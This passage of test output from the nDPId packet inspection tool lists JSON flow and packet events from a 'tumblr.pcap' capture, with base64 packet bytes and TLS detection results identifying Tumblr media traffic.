+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2780,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605292108747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108747,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOpKNiTUmPgBAFOCVEAAABAQgKqXtZHsLc+ww="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2790,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605292108789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108789,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBuhmLaKJd8MhgBAN560UAAABAQgKwt2r5al1DDM="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2796,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605292108796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108796,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9JXKOp\/xMFSYgBAPnfW6AAABAQgKwt2r7Kl1DlE="} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2797,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605292108796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108796,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdEkHBrmkkNzeZgBALy8PxAAABAQgKwt2r7al1DgU="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605292108805,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108805,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdAmJNSY8GjqSkgBAMILKCAAABAQgKwt2r9ql1FBI="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2839,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108895,"flow_last_seen":1605292108895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292108895,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2839,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605292108895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292108895,"pkt":"qtsDr8lk5EKm5WPyht1gCOgvACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3goBu3qld1IAAAAAoAL9IHkiAAACBAWgBAIICgXJqEYAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2848,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605292108917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292108917,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAMAATQMqAcsBIEmLB5kd7IUo3\/YpAbveCh3iVUV6pXdToBJXgDxxAAACBAV4AQMDAwQCCArC3axnBcmoRg=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2849,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605292108917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108917,"pkt":"qtsDr8lk5EKm5WPyht1gCOgvACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3goBu3qld1Md4lVGgBAB+8BsAAABAQgKBcmoXMLdrGc="} 
+00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2850,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292108895,"flow_last_seen":1605292108918,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292108918,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2953,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292108895,"flow_last_seen":1605292108973,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292108973,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12579,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292114506,"flow_last_seen":1605292114506,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292114506,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12579,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605292114506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292114506,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iknWH70O\/fgBATex8tAAABAQgKqXtvnsLdEcs="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12580,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605292114736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292114736,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc7vvQ79+YpJ1igBBY1dkNAAABAQgKwt3C3al6v1A="} 
+00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14179,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14179,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duJjvT55jAgBAB9d1JAAABAQgKVGZuDcLdE7E="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14180,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14180,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gCRbVACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACADwVgBu1ozjhE9MAHmgBAB9RZAAAABAQgK5fXM6cLdEu0="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14181,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14181,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gA8lZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAN+SHGqlIBu\/+4ugmfFZgCgBAB9UmMAAABAQgKTADwSsLdGmw="} 
+00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14182,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14182,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gBu\/tACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACACjDQBuwRHeTthOU5lgBAB9RTKAAABAQgKi91SNsLdGI4="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14183,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14183,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gAlISACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsooBu5EKNZ7ythfhgBAB9RDDAAABAQgKWJK\/EMLdGI8="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14184,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49464,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14184,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gBlBRACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwTgBu2jzM2ULiifpgBAB9R7MAAABAQgK2Fskl8LdF\/4="} 
+00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14185,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49462,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14185,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gBTnWACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwTYBuwdwDB5je19MgBAC+RdtAAABAQgK2Fskl8LdF9E="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14186,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14186,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gCDsgACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAO4bwBu7dGlx3VVkGGgBAB9ZNXAAABAQgKuCcas8LdF48="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14187,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14187,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gBC50ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACADwYoBu\/frxKCU+7xigBACJCsCAAABAQgK5fXM6cLdFzo="} 
+00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14188,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14188,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gCjT0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADrIQBu3CsbiISBiplgBAJFEMHAAABAQgKZRk18sLdF+A="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14189,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14189,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gB1DkACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAO5PoBu5jg6U77lZSLgBAB9bFqAAABAQgKob1mQcLdFBA="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14190,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14190,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gCkAwACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAO5PgBu6pVAe\/PmdazgBAB9nEsAAABAQgKob1mQcLdFA4="} 
+00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14191,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14191,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gCnAxACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAO5PYBu2KmMmkBhhCygBAB9hx4AAABAQgKob1mQcLdFA8="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14192,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHENPnmMC3biY8gBANvdD5AAABAQgKwt3K6VRlt1w="} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14193,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgVAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvBWD0wAeZaM44SgBAN0gneAAABAQgKwt3K8eX1FWk="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14194,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgKAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbuyivK2F+GRCjWfgBAMggWaAAABAQgKwt3K8ViSDUk="} 